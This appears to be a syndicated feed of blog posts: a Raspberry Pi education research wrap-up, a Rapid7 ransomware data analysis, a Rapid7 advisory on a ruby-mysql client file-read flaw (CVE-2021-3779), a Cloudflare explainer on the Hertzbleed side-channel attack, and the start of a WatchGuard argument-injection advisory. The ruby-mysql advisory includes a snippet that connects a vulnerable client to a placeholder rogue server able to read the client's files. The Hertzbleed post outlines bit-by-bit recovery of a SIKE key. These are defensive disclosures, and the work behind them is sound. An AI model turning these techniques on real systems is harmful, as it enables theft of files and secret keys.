  • Try the free training course on pair programming we designed and used for this project. It also includes links to the lesson plans that teachers worked with. 

Collaboration in our research

We will continue to publish evaluation reports and our reflections on the other projects in the Gender Balance in Computing programme. If you would like to stay up-to-date with the programme, you can sign up to the newsletter.

Two learners at a desktop computer doing coding.

The insights gained from this trial will feed forward into our future work. Through the process of working with schools on this project, we have increased our understanding of the process of research in educational settings in many ways. We are very grateful for the input from teachers who took part in the first stage of the trial, with whom we developed an effective co-production model for developing resources, a model we will use in future research projects. Teachers who took part in the second stage of the project told us that the resources we provided were of good quality, which demonstrates the success of this co-production approach to developing resources.

In our new Raspberry Pi Computing Education Research Centre, created with the University of Cambridge Department of Computer Science and Technology, we will collaborate closely with teachers and schools when implementing and evaluating research projects. You are invited to the free in-person launch event of the Centre on 20 July in Cambridge, UK, where we hope to meet many teachers, researchers, and other education practitioners to strengthen a collaborative community around computing education research.

References

[1] Goode, J., Estrella, R., & Margolis, J. (2018). Lost in Translation: Gender and High School Computer Science. In Women and Information Technology. https://doi.org/10.7551/mitpress/7272.003.0005

[2] Alexandria K. Hansen, Hilary A. Dwyer, Ashley Iveland, Mia Talesfore, Lacy Wright, Danielle B. Harlow, and Diana Franklin. 2017. Assessing Children’s Understanding of the Work of Computer Scientists: The Draw-a-Computer-Scientist Test. In Proceedings of the 2017 ACM SIGCSE Technical Symposium on Computer Science Education (SIGCSE ’17). Association for Computing Machinery, New York, NY, USA, 279–284. https://doi.org/10.1145/3017680.3017769

[3] Yasmin B. Kafai and Quinn Burke. 2013. The social turn in K-12 programming: moving from computational thinking to computational participation. In Proceeding of the 44th ACM technical symposium on Computer science education (SIGCSE ’13). Association for Computing Machinery, New York, NY, USA, 603–608. https://doi.org/10.1145/2445196.2445373

[4] Linda Werner & Jill Denner (2009) Pair Programming in Middle School, Journal of Research on Technology in Education, 42:1, 29-49. https://doi.org/10.1080/15391523.2009.10782540

[5] Charlie McDowell, Linda Werner, Heather E. Bullock, and Julian Fernald. 2006. Pair programming improves student retention, confidence, and program quality. Commun. ACM 49, 8 (August 2006), 90–95. https://doi.org/10.1145/1145287.1145293

[6] Denner, J., Werner, L., Campe, S., & Ortiz, E. (2014). Pair programming: Under what conditions is it advantageous for middle school students? Journal of Research on Technology in Education, 46(3), 277–296. https://doi.org/10.1080/15391523.2014.888272

[7] Maria Kallia and Sue Sentance. 2018. Are boys more confident than girls? the role of calibration and students’ self-efficacy in programming tasks and computer science. In Proceedings of the 13th Workshop in Primary and Secondary Computing Education (WiPSCE ’18). Association for Computing Machinery, New York, NY, USA, Article 16, 1–4. https://doi.org/10.1145/3265757.3265773

[8] Bandura, A. (1977). Self-efficacy: Toward a unifying theory of behavioral change. Psychological Review, 84(2), 191–215. https://doi.org/10.1037/0033-295X.84.2.191

[9] Allison Mishkin. 2019. Applying Self-Determination Theory towards Motivating Young Women in Computer Science. In Proceedings of the 50th ACM Technical Symposium on Computer Science Education (SIGCSE ’19). Association for Computing Machinery, New York, NY, USA, 1025–1031. https://doi.org/10.1145/3287324.3287389

For Ransomware Double-Extorters, It’s All About the Benjamins — and Data From Healthcare and Pharma

Post Syndicated from Tom Caiazza original https://blog.rapid7.com/2022/06/28/for-ransomware-double-extorters-its-all-about-the-benjamins-and-data-from-healthcare-and-pharma/

For Ransomware Double-Extorters, It's All About the Benjamins — and Data From Healthcare and Pharma

Welcome to the second installment in our series looking at the latest ransomware research from Rapid7. Two weeks ago, we launched “Pain Points: Ransomware Data Disclosure Trends”, our first-of-its-kind look into the practice of double extortion, what kinds of data get disclosed, and how the ransomware “market” has shifted in the two years since double extortion became a particularly nasty evolution to the practice.

Today, we’re going to talk a little more about the healthcare and pharmaceutical industry data and analysis from the report, highlighting how these two industries differ from some of the other hardest-hit industries and how they relate to each other (or don’t in some cases).

But first, let’s recap what “Pain Points” is actually analyzing. Rapid7’s threat intelligence platform (TIP) scans the clear, deep, and dark web for data on threats and operationalizes that data automatically with our Threat Command product. This means we have at our disposal large amounts of data pertaining to ransomware double extortion that we were able to analyze to determine some interesting trends like never before. Check out the full paper for more detail, and view some well redacted real-world examples of data breaches while you’re at it.

For healthcare and pharma, the risks are heightened

When it comes to the healthcare and pharmaceutical industries, there are some notable similarities that set them apart from other verticals. For instance, internal finance and accounting files showed up in initial ransomware data disclosures more often for healthcare and pharma than for any other industry (71%), including financial services (where you would think financial information would be the most common).

After that, customer and patient data showed up more than 58% of the time, which is still very high and indicates that ransomware attackers place particular value on this data from these industries. This is likely due to the relative amount of legal and regulatory damage these kinds of disclosures could inflict on such highly regulated fields (particularly healthcare).

For Ransomware Double-Extorters, It's All About the Benjamins — and Data From Healthcare and Pharma

All eyes on IP and patient data

Where the healthcare and pharmaceutical sectors differed was in the prevalence of intellectual property (IP) disclosures. The healthcare industry focuses mostly on patients, so it makes sense that one of its biggest data disclosure areas would be personal information. But the pharma industry focuses much more on research and development than it does on the personal information of people. In pharma-related disclosures, IP made up 43% of all disclosures. Again, the predilection of ransomware attackers to “hit ’em where it hurts the most” is on full display here.

Finally, different ransomware groups favor different types of data disclosures, as our data indicated. When it comes to the data most often disclosed from healthcare and pharma victims, REvil and Cl0p were the only groups to do so (10% and 20%, respectively). For customer and patient data, REvil took the top spot with 55% of disclosures, with Darkside behind them at 50%. Conti and Cl0p followed with 42% and 40%, respectively.

So there you have it: When it comes to the healthcare and pharmaceutical industries, financial data, customer data, and intellectual property are the most frequently used data to impose double extortion on ransomware victims.

Ready to dive further into the data? Check out the full report.

CVE-2021-3779: Ruby-MySQL Gem Client File Read (FIXED)

Post Syndicated from Tod Beardsley original https://blog.rapid7.com/2022/06/28/cve-2021-3779-ruby-mysql-gem-client-file-read-fixed/

CVE-2021-3779: Ruby-MySQL Gem Client File Read (FIXED)

The ruby-mysql Ruby gem prior to version 2.10.0 maintained by Tomita Masahiro is vulnerable to an instance of CWE-610: Externally Controlled Reference to a Resource in Another Sphere, wherein a malicious MySQL server can request local file content from a client without explicit authorization from the user. The initial CVSSv3 estimate for this issue is 6.5. Note that this issue does not affect the much more popular mysql2 gem. This issue was fixed in ruby-mysql 2.10.0 on October 23, 2021, and users of ruby-mysql are urged to update.

Product description

The ruby-mysql Ruby gem is an implementation of a MySQL client. While it is far less popular than the mysql2 gem, it serves a particular niche audience of users that desire a pure Ruby implementation of MySQL client functionality without linking to an external library (as mysql2 does).

Credit

This issue was reported to Rapid7 by Hans-Martin Münch of MOGWAI LABS GmbH, initially as a Metasploit issue, and is being disclosed in accordance with Rapid7’s vulnerability disclosure policy after coordination with the upstream maintainer of this library, as well as JPCERT/CC and CERT/CC.

Exploitation

A malicious actor can read arbitrary files from a client that uses ruby-mysql to communicate to a rogue MySQL server and issue database queries. In these cases, the server has the option to create a database reply using the LOAD DATA LOCAL statement, which instructs the client to provide additional data from a local file readable by the client (and not a “local” file on the server). The easiest way to demonstrate this issue is to run an instance of Rogue-MySql-Server by Gifts and perform any database query using the vulnerable version of the mysql gem.
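
To make that flow concrete, the snippet below sketches a vulnerable client interaction. It is a minimal illustration only: the host, credentials, database, and query are placeholders, and it assumes a ruby-mysql version older than 2.10.0 talking to a rogue server such as the one linked above.

require 'mysql'  # the ruby-mysql gem is required as 'mysql'

# Placeholder connection details; in the attack scenario this host is the
# rogue MySQL server under the attacker's control.
client = Mysql.connect('192.0.2.10', 'someuser', 'somepass', 'somedb')

# Any query will do: a rogue server can answer it with a LOAD DATA LOCAL
# file-transfer request, and a vulnerable client will read the named local
# file and send its contents back to the server.
client.query('SELECT 1')

client.close

Against a patched client (2.10.0 or later), the same interaction no longer results in a local file being sent.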

Note that this behavior is a defined and expected option for servers and is described in the documentation, quoted below:

Because LOAD DATA LOCAL is an SQL statement, parsing occurs on the server side, and transfer of the file from the client host to the server host is initiated by the MySQL server, which tells the client the file named in the statement. In theory, a patched server could tell the client program to transfer a file of the server’s choosing rather than the file named in the statement. Such a server could access any file on the client host to which the client user has read access. (A patched server could in fact reply with a file-transfer request to any statement, not just LOAD DATA LOCAL, so a more fundamental issue is that clients should not connect to untrusted servers.) [emphasis added]

So, the vulnerability is not so much a MySQL server or protocol issue, but a vulnerability in a client that does not at least provide an option to disable LOAD DATA LOCAL queries; this is the situation with version 2.9.14 and earlier versions of ruby-mysql.

There is also prior work on this type of issue, and interested readers should refer to Knownsec 404 Team‘s article describing the issue for a thorough understanding of the dangers of LOAD DATA LOCAL and untrusted MySQL servers.

Impact

As stated, this issue only affects Ruby-based MySQL clients that connect to malicious MySQL servers. The vast majority of clients already know who they’re connecting to, and while an attacker could poison DNS records or otherwise intercede in network traffic to capture unwitting clients, such network shenanigans will be foiled by routine security controls like SSL certificates. The true risk is posed only to those people who connect to random and unknown MySQL servers in unfamiliar environments.

In other words, penetration testers and other opportunistic MySQL attackers are most at risk from this kind of vulnerability. CVE-2021-3779 fits squarely in the category of “hacking the hackers,” where an aggressive honeypot is designed to lie in wait for wandering MySQL scanners and attackers and steal data local to those connecting clients.

This is the reason why Hans-Martin Münch of MOGWAI LABS GmbH first brought this to Rapid7’s attention as an issue in Metasploit. While Metasploit users are indeed the most at risk of falling victim to an exploit for this vulnerability, the underlying issue was quickly identified as one in the shared open-source library code that Metasploit depends on for managing MySQL connections to remote servers. (One such example is the MySQL hashdump auxiliary module.)

Remediation

Users of ruby-mysql should update to the latest version of the gem; the issue was fixed in version 2.10.0. The current version (as of this writing) is 3.0.0 and was released in November of 2021.

Users unable to update can patch around the issue by ensuring that CLIENT_LOCAL_FILES is disallowed by the client, similarly to how Metasploit Framework initially remediated this issue while waiting on a fix from the upstream maintainer.
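
For teams rolling the update out, a check along the following lines can flag a vulnerable dependency at application start. This is a sketch only: it assumes the gem is activated under its canonical name, ruby-mysql, and it does not implement the CLIENT_LOCAL_FILES workaround itself, since that depends on client internals.

require 'mysql'  # activates the ruby-mysql gem

spec = Gem.loaded_specs['ruby-mysql']
if spec && spec.version < Gem::Version.new('2.10.0')
  warn "ruby-mysql #{spec.version} is affected by CVE-2021-3779 " \
       "(rogue-server LOAD DATA LOCAL file read); upgrade to >= 2.10.0"
end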

Disclosure timeline

The astute reader will note a significant gap of several months between the fix release and this disclosure. This was a failure on my, Tod Beardsley’s, part, since I was handling this issue.

For the record, there was no intention to bury this vulnerability — after all, we communicated it to Tomita (the maintainer), RubyGems (who pointed us in the direction of Rubysec, thanks André), CERT/CC, and JPCERT/CC, so hopefully the intention to disclose in a timely manner was and is obvious.

But a confluence of family tragedies and home-office technical disasters conspired with the usual complications of a multi-stakeholder, multi-continent effort to coordinate disclosure in open-source library code.

I am also acutely aware of the irony of this delay in light of my recent post on silent patches, and I offer apologies for that delay. I am committed to being better with backups, both of the data and human varieties.

Note that all dates are local to the United States (some dates may differ in Japan and Germany depending on the time of day).

  • August, 2021: Issue discovered by Hans-Martin Münch of MOGWAI LABS GmbH.
  • Thu, Sep 2, 2021: Issue reported to Rapid7’s security contact as a Metasploit issue, #9286.
  • Tue, Sep 7, 2021: Rapid7 validated the issue, reserved CVE-2021-3779, and contacted the vulnerable gem maintainer, Tomita Masahiro.
  • Wed, Sep 8, 2021: Metasploit Framework temporary remediation committed.
  • Wed, Sep 8, 2021: Notified CERT/CC and RubyGems for disclosure coordination, as the gem appeared to be abandoned by the maintainer given no updates in several years.
  • Thu, Sep 9, 2021: Notified JPCERT/CC through VINCE on CERT/CC’s advice, as VU#541053.
  • Fri, Sep 10, 2021: JPCERT/CC acknowledged the issue and attempted to contact the gem maintainer.
  • Mon, Oct 18, 2021: Maintainer responded to JPCERT/CC, acknowledging the issue.
  • Fri, Oct 22, 2021: Fixed version 2.10.0 released, Rapid7 notified Hans-Martin of the fix.
  • Wed, Feb 16, 2022: CERT/CC asks for an update on the issue, Rapid7 communicates the fix to CERT/CC and JPCERT/CC.
  • Mon, Jun 6, 2022: CERT/CC asks for an update, Rapid7 commits to sharing disclosure documentation.
  • Tue, Jun 14, 2022: Rapid7 shares disclosure details with CERT/CC and Hans-Martin, and asks JPCERT/CC to communicate this document to Tomita.
  • Tue, Jun 28, 2022: This public disclosure.

Hertzbleed explained

Post Syndicated from Yingchen Wang original https://blog.cloudflare.com/hertzbleed-explained/

Hertzbleed explained

You may have heard a bit about the Hertzbleed attack that was recently disclosed. Fortunately, one of the student researchers who was part of the team that discovered this vulnerability and developed the attack is spending this summer with Cloudflare Research and can help us understand it better.

The first thing to note is that Hertzbleed is a new type of side-channel attack that relies on changes in CPU frequency. Hertzbleed is a real, and practical, threat to the security of cryptographic software.

Should I be worried?

From the Hertzbleed website,

“If you are an ordinary user and not a cryptography engineer, probably not: you don’t need to apply a patch or change any configurations right now. If you are a cryptography engineer, read on. Also, if you are running a SIKE decapsulation server, make sure to deploy the mitigation described below.”

Notice: As of today, there is no known attack that uses Hertzbleed to target conventional and standardized cryptography, such as the encryption used in Cloudflare products and services. Having said that, let’s get into the details of processor frequency scaling to understand the core of this vulnerability.

In short, the Hertzbleed attack shows that, under certain circumstances, dynamic voltage and frequency scaling (DVFS), a power management scheme of modern x86 processors, depends on the data being processed. This means that on modern processors, the same program can run at different CPU frequencies (and therefore take different wall-clock times). For example, we expect that a CPU takes the same amount of time to perform the following two operations because it uses the same algorithm for both. However, there is an observable time difference between them:

Hertzbleed explained

Trivia: Could you guess which operation runs faster?

Before giving the answer, we will explain some details about how Hertzbleed works and its impact on SIKE, a new cryptographic algorithm designed to be computationally infeasible to break, even for an attacker with a quantum computer.

Frequency Scaling

Suppose a runner is in a long distance race. To optimize the performance, the heart monitors the body all the time. Depending on the input (such as distance or oxygen absorption), it releases the appropriate hormones that will accelerate or slow down the heart rate, and as a result tells the runner to speed up or slow down a little. Just like the heart of a runner, DVFS (dynamic voltage and frequency scaling) is a monitor system for the CPU. It helps the CPU to run at its best under present conditions without being overloaded.

Hertzbleed explained

Just as a runner’s heart causes a runner’s pace to fluctuate throughout a race depending on the level of exertion, when a CPU is running a sustained workload, DVFS modifies the CPU’s frequency from the so-called steady-state frequency. DVFS causes it to switch among multiple performance levels (called P-states) and oscillate among them. Modern DVFS gives the hardware almost full control to adjust the P-states it wants to execute in and the duration it stays at any P-state. These modifications are totally opaque to the user, since they are controlled by hardware and the operating system provides limited visibility and control to the end-user.

The ACPI specification defines the P0 state as the state in which the CPU runs at its maximum performance capability. Moving to higher P-states makes the CPU less performant in favor of consuming less energy and power.

Hertzbleed explained
Suppose a CPU’s steady-state frequency is 4.0 GHz. Under DVFS, frequency can oscillate between 3.9-4.1 GHz.

How long does the CPU stay at each P-state? Most importantly, how can this even lead to a vulnerability? Excellent questions!

Modern DVFS is designed this way because CPUs have a Thermal Design Point (TDP), indicating the expected power consumption at steady state under a sustained workload. For a typical computer desktop processor, such as a Core i7-8700, the TDP is 65 W.

To continue our human running analogy: a typical person can sprint only short distances, and must run longer distances at a slower pace. When the workload is of short duration, DVFS allows the CPU to enter a high-performance state, called Turbo Boost on Intel processors. In this mode, the CPU can temporarily execute very quickly while consuming much more power than TDP allows. But when running a sustained workload, the CPU average power consumption should stay below TDP to prevent overheating. For example, as illustrated below, suppose the CPU has been free of any task for a while; when it first starts running the workload, it runs extra hard (Turbo Boost on). After a while, it realizes that this workload is not a short one, so it slows down and enters steady-state. How much does it slow down? That depends on the TDP. When entering steady-state, the CPU runs at a certain speed such that its current power consumption is not above TDP.

Hertzbleed explained
CPU entering steady state after running at a higher frequency.

Beyond protecting CPUs from overheating, DVFS also wants to maximize the performance. When a runner is in a marathon, she doesn’t run at a fixed pace but rather her pace floats up and down a little. Remember the P-state we mentioned above? CPUs oscillate between P-states just like runners adjust their pace slightly over time. P-states are CPU frequency levels with discrete increments of 100 MHz.

Hertzbleed explained
CPU frequency levels with discrete increments

The CPU can safely run at a high P-state (low frequency) all the time to stay below TDP, but there might be room between its power consumption and the TDP. To maximize CPU performance, DVFS utilizes this gap by allowing the CPU to oscillate between multiple P-states. The CPU stays at each P-state for only dozens of milliseconds, so that its temporary power consumption might exceed or fall below TDP a little, but its average power consumption is equal to TDP.
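
As a toy numerical illustration of that balancing act (the wattages are invented for the example, not measured values): if a 65 W TDP part draws 68 W while at the 4.1 GHz P-state and 62 W while at the 3.9 GHz P-state, and it splits its time evenly between the two, the average lands exactly on the budget:

$ 0.5 \times 68\ \mathrm{W} + 0.5 \times 62\ \mathrm{W} = 65\ \mathrm{W} = \mathrm{TDP} $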

To understand this, check out this figure again.

Hertzbleed explained

If the CPU only wants to protect itself from overheating, it can run at the 3.9 GHz P-state safely. However, DVFS wants to maximize CPU performance by utilizing all available power allowed by TDP. As a result, the CPU oscillates around the 4.0 GHz P-state. It is never far above or below. When at 4.1 GHz, it overloads itself a little and then drops to a higher P-state (lower frequency). When at 3.9 GHz, it recovers and quickly climbs back to a lower P-state (higher frequency). It may not stay long in any P-state, which avoids overheating when at 4.1 GHz and keeps the average power consumption near the TDP.

This is exactly how modern DVFS monitors your CPU to help it optimize power consumption while working hard.

Again, how can DVFS and TDP lead to a vulnerability? We are almost there!

Frequency Scaling vulnerability

The design of DVFS and TDP can be problematic because CPU power consumption is data-dependent! The Hertzbleed paper gives an explicit leakage model of certain operations, identifying two cases.

First, the larger the number of bits set (also known as the Hamming weight) in the operands, the more power an operation takes. The Hamming weight effect is widely observed with no known explanation of its root cause. For example,

Hertzbleed explained

The addition on the left will consume more power compared to the one on the right.

Similarly, when registers change their value there are power variations due to transistor switching. For example, a register switching its value from A to B (as shown in the left) requires flipping only one bit because the Hamming distance of A and B is 1. Meanwhile, switching from C to D will consume more energy to perform six bit transitions since the Hamming distance between C and D is 6.

Hertzbleed explained
Hamming distance
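
Both quantities in this leakage model are easy to compute. The snippet below is purely illustrative (the operand values are arbitrary and are not part of the Hertzbleed tooling); it just shows what Hamming weight and Hamming distance measure.

# Hamming weight: the number of bits set in an operand.
def hamming_weight(x)
  x.to_s(2).count('1')
end

# Hamming distance: the number of bits that flip when a register
# switches from value a to value b.
def hamming_distance(a, b)
  hamming_weight(a ^ b)
end

puts hamming_weight(0xFFFF_0000_0000_0000)  # => 16 (16 bits set)
puts hamming_weight(0x0000_0000_0000_0001)  # => 1  (1 bit set)
puts hamming_distance(0b000001, 0b000000)   # => 1  (one bit flips)
puts hamming_distance(0b101010, 0b010101)   # => 6  (six bits flip)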

Now we see where the vulnerability is! When running sustained workloads, CPU overall performance is capped by TDP. Under modern DVFS, the CPU maximizes its performance by oscillating between multiple P-states. At the same time, CPU power consumption is data-dependent. Inevitably, workloads with different power consumption will lead to different CPU P-state distributions. For example, if workload w1 consumes less power than workload w2, the CPU will stay longer in a lower P-state (higher frequency) when running w1.

Hertzbleed explained
Different power consumption leads to different P-state distribution

As a result, since the power consumption is data-dependent, it follows that CPU frequency adjustments (the distribution of P-states) and execution time (as 1 Hertz = 1 cycle per second) are data-dependent too.

Consider a program that takes five cycles to finish as depicted in the following figure.

Hertzbleed explained
CPU frequency directly translates to running time

As illustrated in the table below, if the program with input 1 runs at 4.0 GHz (red), then it takes 1.25 nanoseconds to finish. If the program consumes more power with input 2, under DVFS, it will run at a lower frequency, 3.5 GHz (blue). It takes more time, 1.43 nanoseconds, to finish. If the program consumes even more power with input 3, under DVFS, it will run at an even lower frequency of 3.0 GHz (purple). Now it takes 1.67 nanoseconds to finish. This program always takes five cycles to finish, but the amount of power it consumes depends on the input. The power influences the CPU frequency, and CPU frequency directly translates to execution time. In the end, the program’s execution time becomes data-dependent.

Execution time of a five-cycle program

Frequency        4.0 GHz    3.5 GHz    3.0 GHz
Execution time   1.25 ns    1.43 ns    1.67 ns
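
These times follow directly from the cycle count and the frequency; as a quick check of the table’s numbers:

$ t = \mathrm{cycles}/f: \quad 5 / 4.0\ \mathrm{GHz} = 1.25\ \mathrm{ns}, \quad 5 / 3.5\ \mathrm{GHz} \approx 1.43\ \mathrm{ns}, \quad 5 / 3.0\ \mathrm{GHz} \approx 1.67\ \mathrm{ns} $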

To give you another concrete example: Suppose we have a sustained workload Foo. We know that Foo consumes more power with input data 1, and less power with input data 2. As shown on the left in the figure below, if the power consumption of Foo is below the TDP, CPU frequency as well as running time stays the same regardless of the choice of input data. However, as shown in the middle, if we add a background stressor to the CPU, the combined power consumption will exceed TDP. Now we are in trouble. CPU overall performance is monitored by DVFS and capped by TDP. To prevent itself from overheating, the CPU dynamically adjusts its P-state distribution when running workloads with varying power consumption. The P-state distribution of Foo(data 1) will have a slight right shift compared to that of Foo(data 2). As shown on the right, the CPU running Foo(data 1) ends up at a lower overall frequency and a longer running time. The observation here is that, if the data is a binary secret, an attacker can infer it simply by measuring the running time of Foo!

Hertzbleed explained
Complete recap of Hertzbleed. Figure taken from Intel’s documentation.

This observation is astonishing because it conflicts with our expectation of a CPU. We expect a CPU to take the same amount of time computing these two additions.

Hertzbleed explained

However, Hertzbleed tells us that, just like a person doing math on paper, a CPU not only takes more power to compute more complicated numbers but also spends more time on them! This is not what a CPU should do while performing a secure computation, because anyone who measures the CPU execution time should not be able to infer the data being computed on.

This takeaway of Hertzbleed creates a significant problem for cryptography implementations, because an attacker shouldn’t be able to infer a secret from a program’s running time. When developers implement a cryptographic protocol from a mathematical construction, a common goal is to ensure constant-time execution. That is, code execution does not leak secret information via a timing channel. We have witnessed that timing attacks are practical: notable examples are those shown by Kocher, Brumley-Boneh, Lucky13, and many others. How to properly implement constant-time code is the subject of extensive study.

Historically, our understanding of which operations contribute to time variation did not take DVFS into account. The Hertzbleed vulnerability derives from this oversight: workloads that differ significantly in power consumption will also differ in timing. Hertzbleed proposes a new perspective on the development of secure programs: any program vulnerable to power analysis becomes potentially vulnerable to timing analysis!

Which cryptographic algorithms are vulnerable to Hertzbleed is unclear. According to the authors, a systematic study of Hertzbleed is left as future work. However, Hertzbleed was exemplified as a vector for attacking SIKE.

Brief description of SIKE

The Supersingular Isogeny Key Encapsulation (SIKE) protocol is a Key Encapsulation Mechanism (KEM) finalist of the NIST Post-Quantum Cryptography competition (currently at Round 3). The building block operation of SIKE is the calculation of isogenies (transformations) between elliptic curves. You can find helpful information about the calculation of isogenies in our previous blog post. In essence, calculating isogenies amounts to evaluating mathematical formulas that take as inputs points on an elliptic curve and produce other different points lying on a different elliptic curve.

Hertzbleed explained

SIKE bases its security on the difficulty of computing a relationship between two elliptic curves. On the one hand, it’s easy to compute this relation (called an isogeny) if the points that generate it (called the kernel of the isogeny) are known in advance. On the other hand, it’s difficult to recover the isogeny given only the two elliptic curves, without knowledge of the kernel points. An attacker has no advantage if the number of possible kernel points to try is large enough to make the search infeasible (computationally intractable), even with the help of a quantum computer.

Similarly to other algorithms based on elliptic curves, such as ECDSA or ECDH, the core of SIKE is calculating operations over points on elliptic curves. As usual, points are represented by a pair of coordinates (x,y) which fulfill the elliptic curve equation

$ y^2 = x^3 + Ax^2 + x $

where A is a parameter identifying different elliptic curves.

For performance reasons, SIKE uses one of the fastest elliptic curve models: the Montgomery curves. The special property that makes these curves fast is that it allows working only with the x-coordinate of points. Hence, one can express the x-coordinate as a fraction x = X / Z, without using the y-coordinate at all. This representation simplifies the calculation of point additions, scalar multiplications, and isogenies between curves. Nonetheless, such simplicity does not come for free, and there is a price to be paid.

The formulas for point operations using Montgomery curves have some edge cases. More technically, a formula is said to be complete if for any valid input a valid output point is produced. Otherwise, a formula is not complete, meaning that there are some exceptional inputs for which it cannot produce a valid output point.

Hertzbleed explained

In practice, algorithms working with incomplete formulas must be designed in such a way that edge cases never occur. Otherwise, algorithms could trigger some undesired effects. Let’s take a closer look at what happens in this situation.

A subtle yet relevant property of some incomplete formulas is the nature of the output they produce when operating on points in the exceptional set. Operating with anomalous inputs, the output has both coordinates equal to zero, so X=0 and Z=0. If we recall our basics on fractions, we can see that there is something odd about the fraction X/Z = 0/0: it is not well-defined. This intuition is not wrong; something bad just happened. This fraction does not represent a valid point on the curve. In fact, it is not even a (projective) point.

The domino effect

Hertzbleed explained

Exploiting this subtlety of mathematical formulas makes a case for the Hertzbleed side-channel attack. In SIKE, whenever an edge case occurs at some point in the middle of its execution, it produces a domino effect that propagates the zero coordinates to subsequent computations, which means the whole algorithm is stuck on 0. As a result, the computation gets corrupted, producing a zero at the end; worse, an attacker can use this domino effect to make guesses about the bits of secret keys.

Trying to guess one bit of the key requires the attacker to be able to trigger an exceptional case exactly at the point in which the bit is used. It looks like the attacker needs to be super lucky to trigger edge cases when it only has control of the input points. Fortunately for the attacker, the internal algorithm used in SIKE has some invariants that can help to hand-craft points in such a way that triggers an exceptional case exactly at the right point. A systematic study of all exceptional points and edge cases was, independently, shown by De Feo et al. as well as in the Hertzbleed article.

With these tools at hand, and using the DVFS side channel, the attacker can now guess bit-by-bit the secret key by passing hand-crafted invalid input points. There are two cases an attacker can observe when the SIKE algorithm uses the secret key:

  • If the bit of interest is equal to the one before it, no edge cases are present and computation proceeds normally, and the program will take the expected amount of wall-time since all the calculations are performed over random-looking data.
  • On the other hand, if the bit of interest is different from the one before it, the algorithm will enter the exceptional case, triggering the domino effect for the rest of the computation, and the DVFS will make the program run faster as it automatically changes the CPU’s frequency.

By querying this oracle repeatedly, the attacker can learn, bit by bit, the secret key used in SIKE.

Ok, let’s recap.

SIKE uses special formulas to speed up operations, but if these formulas are forced to hit certain edge cases then they will fail. Failing due to these edge cases not only corrupts the computation, but also makes the formulas output coordinates with zeros, which in machine representation amount to several registers all loaded with zeros. If the computation continues without noticing the presence of these edge cases, then the processor registers will be stuck on 0 for the rest of the computation. Finally, at the hardware level, some instructions can consume fewer resources if operands are zeroed. Because of that, the DVFS behind CPU power consumption can modify the CPU frequency, which alters the steady-state frequency. The ultimate result is a program that runs faster or slower depending on whether it operates with all zeros versus with random-looking data.

Hertzbleed explained

Hertzbleed’s authors contacted Cloudflare Research because they showed a successful attack on CIRCL, our optimized Go cryptographic library that includes SIKE. We worked closely with the authors to find potential mitigations in the early stages of their research. While the embargo of the disclosure was in effect, another research group including De Feo et al. independently described a systematic study of the possible failures of SIKE formulas, including the same attack found by the Hertzbleed team, and pointed to a proper countermeasure. Hertzbleed borrows such a countermeasure.

What countermeasures are available for SIKE?

Hertzbleed explained

The immediate action specific for SIKE is to prevent edge cases from occurring in the first place. Most SIKE implementations provide a certain amount of leeway, assuming that inputs will not trigger exceptional cases. This is not a safe assumption. Instead, implementations should be hardened and should validate that inputs and keys are well-formed.

Enforcing a strict validation of untrusted inputs is always the recommended action. For example, a common check on elliptic curve-based algorithms is to validate that inputs correspond to points on the curve and that their coordinates are in the proper range from 0 to p-1 (as described in Section 3.2.2.1 of SEC 1). These checks also apply to SIKE, but they are not sufficient.

What malformed inputs have in common in the case of SIKE is that the input points can have arbitrary order. That is, in addition to checking that points lie on the curve, implementations must also check that the points have the prescribed order before accepting them as valid. This is akin to small subgroup attacks on Diffie-Hellman over finite fields. In SIKE, there are several overlapping subgroups on the same curve, and input points with incorrect order should be detected.

The countermeasure, originally proposed by Costello, et al., consists of verifying whether the input points are of the right full-order. To do so, we check whether an input point vanishes only when multiplied by its expected order, and not before when multiplied by smaller scalars. By doing so, the hand-crafted invalid points will not pass this validation routine, which prevents edge cases from appearing during the algorithm execution. In practice, we observed around a 5-10% performance overhead on SIKE decapsulation. The ciphertext validation is already available in CIRCL as of version v1.2.0. We strongly recommend updating your projects that depend on CIRCL to this version, so you can make sure that strict validation on SIKE is in place.
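
Written out in generic notation (this is the mathematical condition behind the check, not CIRCL’s actual API): a received point $P$ that is supposed to generate a subgroup of order $2^{e_2}$ is accepted only if it vanishes at its full order and not one step earlier, that is

$ [2^{e_2}]P = O \quad \text{and} \quad [2^{e_2-1}]P \neq O, $

where $O$ is the point at infinity, and analogously with $3^{e_3}$ on the other side of the key exchange. Because $2^{e_2}$ has a single prime factor, checking one multiple below the full order is enough to rule out every smaller possible order.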

Hertzbleed explained

Closing comments

Hertzbleed shows that certain workloads can induce changes in the frequency scaling of the processor, making programs run faster or slower. In this setting, small differences in the bit pattern of data result in observable differences in execution time. This puts a spotlight on the state-of-the-art techniques used so far to protect against timing attacks, and makes us rethink the measures needed to produce constant-time code and secure implementations. Defending against features like DVFS seems to be something that programmers should start to consider too.

Although SIKE was the victim this time, it is possible that other cryptographic algorithms may expose similar symptoms that can be leveraged by Hertzbleed. An investigation of other targets with this brand-new tool in the attacker’s portfolio remains an open problem.

Hertzbleed allowed us to learn more about how the machines we have in front of us work and how the processor constantly monitors itself, optimizing the performance of the system. Hardware manufacturers have focused on the performance of processors by providing many optimizations; however, further study of the security of computations is also needed.

If you are excited about this project, at Cloudflare we are working on raising the bar on the production of code for cryptography. Reach out to us if you are interested in high-assurance tools for developers, and don’t forget our outreach programs whether you are a student, a faculty member, or an independent researcher.

CVE-2022-31749: WatchGuard Authenticated Arbitrary File Read/Write (Fixed)

Post Syndicated from Jake Baines original https://blog.rapid7.com/2022/06/23/cve-2022-31749-watchguard-authenticated-arbitrary-file-read-write-fixed/

CVE-2022-31749: WatchGuard Authenticated Arbitrary File Read/Write (Fixed)

A remote and low-privileged WatchGuard Firebox or XTM user can read arbitrary system files when using the SSH interface, due to an argument injection vulnerability affecting the diagnose command. Additionally, a remote and highly privileged user can write arbitrary system files when using the SSH interface, due to an argument injection affecting the import pac command. Rapid7 reported these issues to WatchGuard, and the vulnerabilities were assigned CVE-2022-31749. On June 23, WatchGuard published an advisory and released patches in Fireware OS 12.8.1, 12.5.10, and 12.1.4.

Background

WatchGuard Firebox and XTM appliances are firewall and VPN solutions ranging in form factor from tabletop, rack mounted, virtualized, and “rugged” ICS designs. The appliances share a common underlying operating system named Fireware OS.

At the time of writing, there are more than 25,000 WatchGuard appliances with their HTTP interface discoverable on Shodan. There are more than 9,000 WatchGuard appliances exposing their SSH interface.

